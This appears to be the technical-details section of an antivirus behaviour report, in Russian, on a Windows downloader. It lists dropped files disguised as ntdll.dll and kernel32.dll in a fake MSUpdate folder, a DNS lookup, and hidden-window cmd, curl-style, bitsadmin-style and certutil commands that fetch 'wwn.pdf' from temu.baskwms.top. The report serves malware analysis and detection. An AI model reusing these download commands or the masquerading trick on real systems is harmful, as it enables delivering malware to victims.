Техническая информация
- 'C:\users\public\documents\msupdate_51262\ntdll.dll' -k -s -L -o "C:\Users\Public\Documents\MSUpdate_51262\wwn.pdf" http://temu.baskwms.top/wwn.pdf
- 'C:\users\public\documents\msupdate_51262\kernel32.dll' /transfer job /download /priority normal http://temu.baskwms.top/wwn.pdf "C:\Users\Public\Documents\MSUpdate_51262\wwn.pdf"
- C:\users\public\documents\msupdate_51262\ntdll.dll
- C:\users\public\documents\msupdate_51262\kernel32.dll
- %LOCALAPPDATA%\microsoft\windows\inetcookies\deprecated.cookie
- C:\users\public\documents\msupdate_51262\ntdll.dll
- C:\users\public\documents\msupdate_51262\kernel32.dll
- DNS ASK te##.#askwms.top
- '<SYSTEM32>\cmd.exe' /c C:\Users\Public\Documents\MSUpdate_51262\ntdll.dll -k -s -L -o "C:\Users\Public\Documents\MSUpdate_51262\wwn.pdf" http://temu.baskwms.top/wwn.pdf (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c C:\Users\Public\Documents\MSUpdate_51262\kernel32.dll /transfer job /download /priority normal http://temu.baskwms.top/wwn.pdf "C:\Users\Public\Documents\MSUpdate_51262\wwn.pdf" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c certutil -urlcache -split -f http://temu.baskwms.top/wwn.pdf "C:\Users\Public\Documents\MSUpdate_51262\wwn.pdf" (со скрытым окном)
- '<SYSTEM32>\certutil.exe' -urlcache -split -f http://temu.baskwms.top/wwn.pdf "C:\Users\Public\Documents\MSUpdate_51262\wwn.pdf"